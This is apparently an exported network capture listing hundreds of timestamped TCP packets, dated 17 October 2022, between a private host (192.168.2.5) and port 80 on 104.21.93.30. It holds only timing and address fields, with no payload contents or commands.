                                                                                                                                  Oct 17, 2022 22:06:38.599055052 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.599071026 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.599087000 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.599093914 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.599102974 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.599132061 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.599158049 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.600276947 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600302935 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600327015 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600356102 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600379944 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600387096 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.600402117 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600425005 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600435972 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.600449085 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600466013 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.600474119 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600492954 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.600497961 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600519896 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600543976 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600543976 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.600567102 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600585938 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.600589037 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600611925 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600621939 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.600635052 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600653887 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.600672007 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.606148958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606225014 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606257915 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606319904 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606317997 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.606347084 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606360912 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.606379032 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606425047 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.606466055 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606499910 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606522083 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.606533051 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606566906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606575012 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.606591940 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606617928 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606642962 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606643915 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.606674910 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606686115 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.606709957 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606735945 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606760979 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.606761932 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606787920 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606797934 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.606820107 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606853008 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606862068 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.606894970 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606928110 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606933117 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.606961966 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.606995106 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607024908 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607027054 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607058048 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607065916 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607083082 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607115984 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607144117 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607462883 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607496023 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607526064 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607537985 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607549906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607570887 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607574940 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607599020 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607615948 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607624054 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607640028 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607665062 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607680082 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607681990 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607706070 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607707977 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607729912 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607747078 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607750893 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607769012 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607789040 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607795000 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607815027 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607832909 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607835054 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607852936 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607872963 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607873917 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607892036 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607908010 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607917070 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607939005 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607953072 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607959032 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607979059 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.607995987 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.607996941 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608014107 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608030081 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608031988 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.608057976 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608074903 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608095884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608103991 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.608124971 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608130932 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.608143091 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608186960 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.608448982 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608480930 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608505964 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.608515024 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608556032 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.608562946 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608588934 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608623981 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608630896 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.608649969 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608685017 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608699083 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.608710051 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608743906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608760118 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.608773947 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608800888 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608818054 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.608825922 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608850956 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608869076 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.608882904 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608906984 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608923912 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.608932018 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608959913 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.608980894 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.608988047 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.609013081 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.609033108 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.609050989 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.609076977 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.609091043 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.609108925 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.609141111 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.609164953 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.609164953 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.609205961 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.610280037 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610344887 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610371113 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610399961 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610419989 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.610450983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610479116 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610491037 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.610510111 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610534906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610539913 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.610577106 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610600948 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610610962 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.610626936 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610645056 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.610661983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610687017 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610708952 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.610718012 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610749960 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610763073 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.610774994 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610806942 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610810041 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.610837936 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610869884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610892057 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.610914946 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610940933 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.610956907 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.610977888 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.611004114 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.611021996 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.611036062 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.611067057 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.611119032 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.611793995 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.611829042 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.611861944 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.611872911 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.611886978 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.611905098 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.611922979 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.611948013 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.611959934 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.611972094 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612005949 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612010956 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.612030983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612056017 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612071037 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.612088919 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612113953 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612133026 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.612138987 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612171888 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612174034 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.612195015 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612220049 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612251997 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612255096 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.612276077 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612296104 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.612299919 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612330914 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612334013 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.612360954 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612396955 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612399101 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.612423897 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612447023 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.612458944 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.627536058 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.632466078 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.661051035 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661150932 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.661164999 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661194086 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661218882 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661227942 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.661246061 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661269903 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661278009 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.661295891 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661325932 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661341906 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.661355972 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661381006 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661391020 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.661402941 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661427975 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661433935 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.661451101 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661480904 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661483049 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.661515951 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661540985 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661549091 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.661566973 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661590099 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661604881 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.661613941 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661648035 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.661653042 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661673069 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.661704063 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.666058064 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666091919 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666115999 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666142941 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666176081 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666199923 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666218996 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666219950 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.666244030 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666300058 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.666320086 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.666439056 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666469097 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666493893 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666507006 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.666517973 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666543007 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666551113 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.666567087 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666591883 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666599035 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.666615009 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666646957 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.666647911 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666672945 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666697979 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666703939 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.666722059 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666745901 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666753054 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.666769028 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.666805029 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.666807890 CEST8049692104.21.93.30192.168.2.5
